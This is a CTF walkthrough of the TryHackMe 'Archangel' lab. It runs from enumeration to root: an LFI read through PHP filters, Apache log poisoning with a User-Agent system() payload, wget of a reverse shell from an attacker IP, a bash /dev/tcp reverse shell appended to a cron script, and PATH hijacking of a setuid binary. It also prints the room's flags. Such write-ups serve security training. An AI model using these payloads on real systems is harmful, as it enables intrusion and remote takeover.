Tryhackme - Archangel

Tryhackme – Archangel

In this walk through, we will be going through the Archangel from Tryhackme. This room is rated as easy on the platform and it involves Web Enumeration, LFI Exploitation and Linux Privilege Escalation stuff. So, let’s get started without any delay.

Archangel

Machine Info:

TitleARcHanG3l
IPaddress10.10.64.39
DifficultyEasy
ObjectiveA well known security solutions company seems to be doing some testing on their live machine. Best time to exploit it.

Task 1 – Deploy Machine

Task 1 - Deploy Machine

Task 2 – Get a shell

Enumerate the machine

wh1terose@fsociety:~$ sudo nmap -sS -sV 10.18.11.103
Starting Nmap 7.80 ( https://nmap.org ) at 2023-07-16 00:11 IST
Nmap scan report for fsociety (10.18.11.103)
Host is up (0.0000070s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http    Apache httpd 2.4.41 ((Ubuntu))
111/tcp open  rpcbind 2-4 (RPC #100000)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.96 seconds

Question 1 – Find a different hostname

email address

mafialive.thm

Question 2 – Find flag 1

  • Add the IP Address in /etc/hosts file along with the domain name.

/etc/hosts file

flag 1

thm{f0und_th3_r1ght_h0st_n4m3}

Question 3 – Look for a page under development

  • Using gobuster for directory bruteforcing in order to reveal sensitive directories and files.

wh1terose@fsociety:~/PycharmProjects/Zeus$ gobuster dir -u http://mafialive.thm/ -w ~/Desktop/Wordlist/common.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://mafialive.thm/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2023/07/16 00:12:34 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 278]
/.htaccess            (Status: 403) [Size: 278]
/.htpasswd            (Status: 403) [Size: 278]
/index.html           (Status: 200) [Size: 59] 
/robots.txt           (Status: 200) [Size: 34] 
/server-status        (Status: 403) [Size: 278]
                                               
===============================================================
2023/07/16 00:14:00 Finished
===============================================================

gobuster scan

  • Found an interesting entry in robots.txt

robots.txt

test.php

Question 4 – Find flag 2

  • The test page has a button which is has a view parameter that maybe susceptible to LFI.

test.php

  • We will use curl in order to issue a request to the parameter and use PHP filter to display the contents of test.php

curl -s http://mafialive.thm/test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/test.php
	

bypass LFI

  • We received a response in base64. On decoding this, we came to know that the page is using the GET variable and the filtering that is being done in order to prevent any exploitation.

echo "CQo8IURPQ1RZUEUgSFRNTD4KPGh0bWw+Cgo8aGVhZD4KICAgIDx0aXRsZT5JTkNMVURFPC90aXRsZT4KICAgIDxoMT5UZXN0IFBhZ2UuIE5vdCB0byBiZSBEZXBsb3llZDwvaDE+CiAKICAgIDwvYnV0dG9uPjwvYT4gPGEgaHJlZj0iL3Rlc3QucGhwP3ZpZXc9L3Zhci93d3cvaHRtbC9kZXZlbG9wbWVudF90ZXN0aW5nL21ycm9ib3QucGhwIj48YnV0dG9uIGlkPSJzZWNyZXQiPkhlcmUgaXMgYSBidXR0b248L2J1dHRvbj48L2E+PGJyPgogICAgICAgIDw/cGhwCgoJICAgIC8vRkxBRzogdGhte2V4cGxvMXQxbmdfbGYxfQoKICAgICAgICAgICAgZnVuY3Rpb24gY29udGFpbnNTdHIoJHN0ciwgJHN1YnN0cikgewogICAgICAgICAgICAgICAgcmV0dXJuIHN0cnBvcygkc3RyLCAkc3Vic3RyKSAhPT0gZmFsc2U7CiAgICAgICAgICAgIH0KCSAgICBpZihpc3NldCgkX0dFVFsidmlldyJdKSl7CgkgICAgaWYoIWNvbnRhaW5zU3RyKCRfR0VUWyd2aWV3J10sICcuLi8uLicpICYmIGNvbnRhaW5zU3RyKCRfR0VUWyd2aWV3J10sICcvdmFyL3d3dy9odG1sL2RldmVsb3BtZW50X3Rlc3RpbmcnKSkgewogICAgICAgICAgICAJaW5jbHVkZSAkX0dFVFsndmlldyddOwogICAgICAgICAgICB9ZWxzZXsKCgkJZWNobyAnU29ycnksIFRoYXRzIG5vdCBhbGxvd2VkJzsKICAgICAgICAgICAgfQoJfQogICAgICAgID8+CiAgICA8L2Rpdj4KPC9ib2R5PgoKPC9odG1sPgoKCg==" | base64 -d

base64 decode

thm{explo1t1ng_lf1}

Question 5 – Get a shell and find the user flag

  • First we will use the apache2 access.log file in order to check if its working and if we can append our malicious query using that.

URL – http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././../log/apache2/access.log

apache2 access logs

  • Next, we will append our command after the initial query where we download a reverse shell to the tmp directory using wget.

curl -H 'User-Agent:<?php system($_GET['cmd']);?>' 'http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././../log/apache2/access.log&cmd=wget%2010.18.11.103:8000/shell.php%20-O%20/tmp/reverse.php

reverse shell

apache log

  • Let’s execute the reverse shell and get a connection at our netcat listener.

curl -H 'User-Agent:<?php system($_GET['cmd']);?>' 'http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././.././.././.././var/log/apache2/access.log&cmd=chmod%20777%20/tmp/reverse.php;%20php%20/tmp/reverse.php'

reverse shell execute

netcat listener

  • Once got the initial access, upgraded the shell with python tty and got the user flag.

wh1terose@fsociety:~/CTF/TryHackme/Archangel$ nc -lvnp 1234
Listening on 0.0.0.0 1234
Connection received on 10.10.115.252 60754
Linux ubuntu 4.15.0-123-generic #126-Ubuntu SMP Wed Oct 21 09:40:11 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 01:26:31 up  1:37,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)

$ python3 -c 'import pty;pty.spawn("/bin/bash")'                                                       
www-data@ubuntu:/$ ls
ls
bin   home	      lib64	  opt	sbin	  tmp	   vmlinuz.old
boot  initrd.img      lost+found  proc	srv	  usr
dev   initrd.img.old  media	  root	swapfile  var
etc   lib	      mnt	  run	sys	  vmlinuz

www-data@ubuntu:/home/archangel$ cat user.txt
cat user.txt
thm{lf1_t0_rc3_1s_tr1cky}

user.txt

thm{lf1_t0_rc3_1s_tr1cky}

Task 3 – Root the machine

Do privilege escalation

Question 1 – Get User 2 flag

www-data@ubuntu:/opt$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user	command
*/1 *   * * *   archangel /opt/helloworld.sh
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

crontab

$ echo "bash -i >& /dev/tcp/10.18.11.103/4444 0>&1" >> helloworld.sh

helloworld.sh

user2.txt

thm{h0r1zont4l_pr1v1l3g3_2sc4ll4t10n_us1ng_cr0n}

Question 2 – Root the machine and find the root flag

archangel@ubuntu:~/secret$ file ./backup
file ./backup
./backup: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=9093af828f30f957efce9020adc16dc214371d45, for GNU/Linux 3.2.0, not stripped
archangel@ubuntu:~/secret$ echo '/bin/bash -p' > cp
echo '/bin/bash -p' > cp
archangel@ubuntu:~/secret$ chmod 777 cp
chmod 777 cp
archangel@ubuntu:~/secret$ export PATH=/home/archangel/secret:$PATH
export PATH=/home/archangel/secret:$PATH
archangel@ubuntu:~/secret$ echo $PATH
echo $PATH
/home/archangel/secret:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
archangel@ubuntu:~/secret$ ./backup
./backup

id
uid=0(root) gid=0(root) groups=0(root),1001(archangel)
whoami
root
python3 -c 'import pty;pty.spawn("/bin/bash")'
root@ubuntu:~/secret# cd /root      
cd /root
root@ubuntu:/root# ls  
ls
root.txt
root@ubuntu:/root# cat root.txt
cat root.txt
thm{p4th_v4r1abl3_expl01tat1ion_f0r_v3rt1c4l_pr1v1l3g3_3sc4ll4t10n}
root@ubuntu:/root# 

root flag

 thm{p4th_v4r1abl3_expl01tat1ion_f0r_v3rt1c4l_pr1v1l3g3_3sc4ll4t10n}

Task 3 - Root the machine

Task 3 - Root the machine

Also Read: Tryhackme – Year of the Rabbit

Conclusion:

Conclusion

So that was “Archangel” for you. We started off with a regular nmap scan and found two ports opened – 80 (HTTP) and 22 (SSH). Next, enumerated the web application running and got a hostname in the support email address. Added the hostname “maifalive.thm” in the /etc/hosts file. Moving on, we used gobuster to scan for some directories. In the robots.txt file got an entry of page test.php. The test.php page has a button to view the contents of the test.php file. The request was vulnerable to LFI. We bypassed it using PHP filters and uploaded our reverse shell via Curl. For the horizontal privilege escalation, we changed the contents of helloworld.sh found in crontab entries to our reverse shell which gives us the access to user archangel. At last, we escalated our privileges to root by hijacking and perform path manipulation our the backup binary. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top